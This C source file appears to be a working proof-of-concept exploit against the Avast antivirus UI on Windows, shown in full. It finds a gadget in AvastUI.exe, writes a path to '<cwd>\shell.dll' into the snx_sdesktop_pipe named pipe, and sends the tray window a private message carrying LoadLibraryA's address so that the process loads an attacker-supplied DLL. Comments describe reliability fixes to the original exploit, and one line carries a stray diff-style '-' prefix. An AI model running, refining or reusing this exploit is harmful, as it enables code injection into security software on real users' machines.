#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <winternl.h>
#include <string.h>
#include <strsafe.h>   /* keep last: it deprecates the unbounded CRT string functions */
#pragma comment( lib, "user32" )
/*
 * Find the first occurrence of needle[0..nlen) inside haystack[0..hlen).
 *
 * Returns a pointer to the start of the match, or NULL when nlen is 0,
 * when nlen exceeds hlen, or when no match exists.  Every memchr() and
 * memcmp() below stays inside haystack: a match can only start in the
 * first (remaining - nlen + 1) bytes of what is left, so that is the
 * window each memchr() is bounded by.
 */
PBYTE memmem( PBYTE haystack, SIZE_T hlen, PBYTE needle, SIZE_T nlen )
{
    PBYTE cursor = haystack;
    SIZE_T remaining = hlen;
    BYTE first;

    if ( 0 == nlen )
        return NULL;

    first = needle[0];

    for ( ;; )
    {
        /* Not enough bytes left for a full needle -> no match possible. */
        if ( remaining < nlen )
            return NULL;

        cursor = memchr( cursor, first, remaining - nlen + 1 );
        if ( NULL == cursor )
            return NULL;

        if ( 0 == memcmp( cursor, needle, nlen ) )
            return cursor;

        /* Candidate rejected: resume one byte further on. */
        cursor++;
        remaining = hlen - ( SIZE_T )( cursor - haystack );
    }
}
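/*
 * Locate a named section inside an image already mapped at pModule.
 *
 * pModule        - base of a mapped PE image (here: the HMODULE from LoadLibraryEx).
 * szSectionName  - NUL-terminated section name, at most IMAGE_SIZEOF_SHORT_NAME (8) bytes.
 * ppSection      - receives pModule + VirtualAddress of the section (NULL on failure).
 * pdwSectionSize - receives VirtualSize rounded up to SectionAlignment (0 on failure).
 *
 * Returns TRUE when the section was found and lies inside SizeOfImage.
 *
 * Fixes relative to the original:
 *  - IMAGE_SECTION_HEADER.Name is an 8-byte field that is NOT NUL-terminated when
 *    all 8 bytes are used; strcmp() (and "%S") read past it.  The compare is now
 *    bounded to IMAGE_SIZEOF_SHORT_NAME and the needle length is checked first so a
 *    longer needle cannot produce a false positive.
 *  - Guards against a negative e_lfanew, a zero SectionAlignment (divide by zero in
 *    the rounding) and a section range that runs past SizeOfImage.
 *
 * NOTE: IMAGE_NT_HEADERS / IMAGE_NT_OPTIONAL_HDR_MAGIC follow the build's bitness
 * (winnt.h), so an x64 build rejects a 32-bit image at the Magic check.
 */
BOOL GetSectionInfo( PBYTE pModule, PBYTE szSectionName, PBYTE *ppSection, PDWORD pdwSectionSize )
{
    PIMAGE_DOS_HEADER pDOSHeader;
    PIMAGE_NT_HEADERS pNTHeaders;
    PIMAGE_OPTIONAL_HEADER pOptionalHeader;
    PIMAGE_SECTION_HEADER pSectionHeader;
    SIZE_T cbName;
    UINT i;

    *ppSection = NULL;
    *pdwSectionSize = 0;

    if ( NULL == pModule || NULL == szSectionName )
        return FALSE;

    cbName = strlen( ( const char * )szSectionName );
    if ( 0 == cbName || cbName > IMAGE_SIZEOF_SHORT_NAME )
        return FALSE;

    pDOSHeader = ( PIMAGE_DOS_HEADER )pModule;
    if ( IMAGE_DOS_SIGNATURE != pDOSHeader->e_magic )
        return FALSE;
    /* e_lfanew is a signed LONG; a negative value would point before the image. */
    if ( pDOSHeader->e_lfanew < 0 )
        return FALSE;

    pNTHeaders = ( PIMAGE_NT_HEADERS )( pModule + pDOSHeader->e_lfanew );
    if ( IMAGE_NT_SIGNATURE != pNTHeaders->Signature )
        return FALSE;

    pOptionalHeader = &pNTHeaders->OptionalHeader;
    if ( IMAGE_NT_OPTIONAL_HDR_MAGIC != pOptionalHeader->Magic )
        return FALSE;
    if ( 0 == pOptionalHeader->SectionAlignment )
        return FALSE;

    /* Section table starts right after the optional header. */
    pSectionHeader = ( PIMAGE_SECTION_HEADER )( ( PBYTE )pOptionalHeader +
                                                pNTHeaders->FileHeader.SizeOfOptionalHeader );

    for ( i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++ )
    {
        DWORD dwSize, dwRem;

        if ( 0 != strncmp( ( const char * )pSectionHeader->Name,
                           ( const char * )szSectionName,
                           IMAGE_SIZEOF_SHORT_NAME ) )
            continue;

        /* Round VirtualSize up to the section alignment (as the original did). */
        dwSize = pSectionHeader->Misc.VirtualSize;
        dwRem = dwSize % pOptionalHeader->SectionAlignment;
        if ( 0 != dwRem )
        {
            dwSize += pOptionalHeader->SectionAlignment - dwRem;
            if ( dwSize < pSectionHeader->Misc.VirtualSize )
                return FALSE;   /* DWORD wrap-around */
        }

        /* Keep the returned range inside the mapped image. */
        if ( pSectionHeader->VirtualAddress > pOptionalHeader->SizeOfImage ||
             dwSize > pOptionalHeader->SizeOfImage - pSectionHeader->VirtualAddress )
            return FALSE;

        *ppSection = pModule + pSectionHeader->VirtualAddress;
        *pdwSectionSize = dwSize;
        /* "%.8S": the name field may have no terminator. */
        _tprintf( _T( "[?] %.8S: 0x%08Ix 0x%08x\n" ),
                  pSectionHeader->Name,
                  ( DWORD_PTR )*ppSection,
                  *pdwSectionSize );
        return TRUE;
    }
    return FALSE;
}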
- static BYTE g_pbGadget[] = { 0x05, 0xff, 0xff, 0x55, 0x58 }; //add eax,-0A7AA0001h
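/*
 * Entry point.  Steps, in order:
 *  1. build "<cwd>\shell.dll" in a zeroed 0x2c-byte record;
 *  2. map AvastUI.exe into this process and find the gadget in its .text;
 *  3. read the 32-bit address stored right before the gadget;
 *  4. find the AVAST tray window;
 *  5. write the record to \\.\pipe\snx_sdesktop_pipe ten times;
 *  6. send the tray window message 0x83fd with wParam = &LoadLibraryA and
 *     lParam = the address from step 3.
 *
 * Exit status: 0 after the message was sent, 1 on any failure (the original
 * returned 0 on every path, which hides failures from a calling script).
 *
 * Fixes relative to the original:
 *  - GetCurrentDirectoryA() returns the *required* size when the buffer is too
 *    small (and leaves it untouched); only 0 was checked, so an over-long cwd
 *    silently produced "\shell.dll".
 *  - LoadLibraryEx() and memmem() results were never checked; both paths
 *    dereferenced a NULL/garbage pointer.
 *  - the pipe handle leaked on the WriteFile() error path; the module was never freed.
 *  - the address before the gadget is read as a 4-byte value (it is a 32-bit
 *    immediate), not as a pointer-sized load.
 */
int _tmain( int argc, TCHAR *argv[] )
{
    HMODULE hAvastUI;
    INT i;
    PBYTE pSection;
    DWORD dwSectionSize;
    PBYTE pbGadget;
    DWORD dwStructAddr;
    PBYTE pbNamedPipeStructure;
    HANDLE hPipe;
    HWND hWnd;
    BYTE szDll[0x2c] = { 0 };
    DWORD dwPathLen;
    DWORD dwBytesWritten;
    FARPROC pLoadLibraryA;

    ( void )argc;
    ( void )argv;

    /* 1. The whole 0x2c-byte buffer is what gets written to the pipe below, so
     * it is zero-initialised and the path must fit with room for the suffix. */
    dwPathLen = GetCurrentDirectoryA( sizeof( szDll ), ( LPSTR )szDll );
    if ( 0 == dwPathLen )
    {
        _tprintf( _T( "[-] GetCurrentDirectoryA() failed (0x%08x)\n" ), GetLastError() );
        return 1;
    }
    if ( dwPathLen >= sizeof( szDll ) )
    {
        _tprintf( _T( "[-] current directory path too long\n" ) );
        return 1;
    }
    if ( FAILED( StringCchCatA( ( STRSAFE_LPSTR )szDll, sizeof( szDll ), "\\shell.dll" ) ) )
    {
        _tprintf( _T( "[-] StringCchCatA() failed\n" ) );
        return 1;
    }

    /* 2. Map the image without running DllMain or resolving imports; only its
     * bytes are needed. */
    hAvastUI = LoadLibraryEx( _T( "C:\\Program Files\\AVAST Software\\Avast\\AvastUI.exe" ),
                              0,
                              DONT_RESOLVE_DLL_REFERENCES );
    if ( NULL == hAvastUI )
    {
        _tprintf( _T( "[-] LoadLibraryEx() failed (0x%08x)\n" ), GetLastError() );
        return 1;
    }
    _tprintf( _T( "[?] hAvastUI = 0x%08Ix\n" ), ( DWORD_PTR )hAvastUI );

    if ( FALSE == GetSectionInfo( ( PBYTE )hAvastUI, ( PBYTE )".text", &pSection, &dwSectionSize ) )
    {
        _tprintf( _T( "[-] AvastUI.exe '.text' section not found\n" ) );
        FreeLibrary( hAvastUI );
        return 1;
    }

    /* 3. The 4 bytes immediately preceding the gadget are taken as a 32-bit
     * absolute address -- presumably the operand of the preceding instruction,
     * pointing at the structure the pipe writes populate; that is inferred from
     * the pattern, not shown here (verify against the AvastUI.exe disassembly).
     * The value comes from THIS process's mapping of the image; it is only
     * meaningful in the running AvastUI process if both were mapped at the same
     * base. */
    pbGadget = memmem( pSection, dwSectionSize, g_pbGadget, sizeof( g_pbGadget ) );
    if ( NULL == pbGadget || ( pbGadget - pSection ) < ( ptrdiff_t )sizeof( dwStructAddr ) )
    {
        _tprintf( _T( "[-] gadget not found in AvastUI.exe '.text'\n" ) );
        FreeLibrary( hAvastUI );
        return 1;
    }
    memcpy( &dwStructAddr, pbGadget - sizeof( dwStructAddr ), sizeof( dwStructAddr ) );
    pbNamedPipeStructure = ( PBYTE )( DWORD_PTR )dwStructAddr;
    _tprintf( _T( "[?] pbNamedPipeStructure = 0x%08Ix\n" ), ( DWORD_PTR )pbNamedPipeStructure );

    /* Nothing below reads the mapping any more. */
    FreeLibrary( hAvastUI );

    /* 4. Target window, resolved before touching the pipe so a missing AVAST UI
     * fails early. */
    hWnd = FindWindow( _T( "asw_av_tray_icon_wndclass" ), NULL );
    if ( NULL == hWnd )
    {
        _tprintf( _T( "[-] FindWindow() failed (0x%08x)\n" ), GetLastError() );
        return 1;
    }

    /* 5. Ten writes of the same record.  Why ten is not stated in the original;
     * presumably the reader needs several records before the structure is in the
     * expected state -- TODO confirm. */
    for ( i = 0; i < 10; i++ )
    {
        BOOL bWritten;

        /* Wait (forever) for a free instance; if the pipe does not exist at all
         * this returns at once and CreateFile() below reports the failure. */
        WaitNamedPipe( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ), NMPWAIT_WAIT_FOREVER );

        hPipe = CreateFile( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
                            GENERIC_WRITE,
                            0,
                            NULL,
                            OPEN_EXISTING,
                            0,
                            NULL );
        if ( INVALID_HANDLE_VALUE == hPipe )
        {
            _tprintf( _T( "[-] CreateFile() failed (0x%08x)\n" ), GetLastError() );
            return 1;
        }
        _tprintf( _T( "[?] Pipe successfully opened (%d)\n" ), i );

        bWritten = WriteFile( hPipe, szDll, sizeof( szDll ), &dwBytesWritten, NULL );
        if ( !bWritten || sizeof( szDll ) != dwBytesWritten )
        {
            DWORD dwErr = GetLastError();   /* CloseHandle() may clobber it */
            CloseHandle( hPipe );
            _tprintf( _T( "[-] WriteFile() failed (0x%08x)\n" ), dwErr );
            return 1;
        }
        CloseHandle( hPipe );
    }

    /* 6. 0x83fd lies in the WM_APP range (WM_APP + 0x3fd), i.e. a private message
     * of the tray window.  wParam carries the address of LoadLibraryA, lParam the
     * address read in step 3; the handler presumably calls wParam(lParam) inside
     * the AvastUI process, which only works if kernel32 is mapped at the same base
     * there (normal for one boot session).  The handler's semantics are not
     * visible here -- confirm against the disassembly.  SendMessage()'s return
     * value says nothing about whether the load happened, so it is not checked. */
    pLoadLibraryA = GetProcAddress( GetModuleHandle( _T( "kernel32.dll" ) ), "LoadLibraryA" );
    if ( NULL == pLoadLibraryA )
    {
        _tprintf( _T( "[-] GetProcAddress(LoadLibraryA) failed (0x%08x)\n" ), GetLastError() );
        return 1;
    }
    SendMessage( hWnd,
                 0x83fd,
                 ( WPARAM )pLoadLibraryA,
                 ( LPARAM )pbNamedPipeStructure );
    return 0;
}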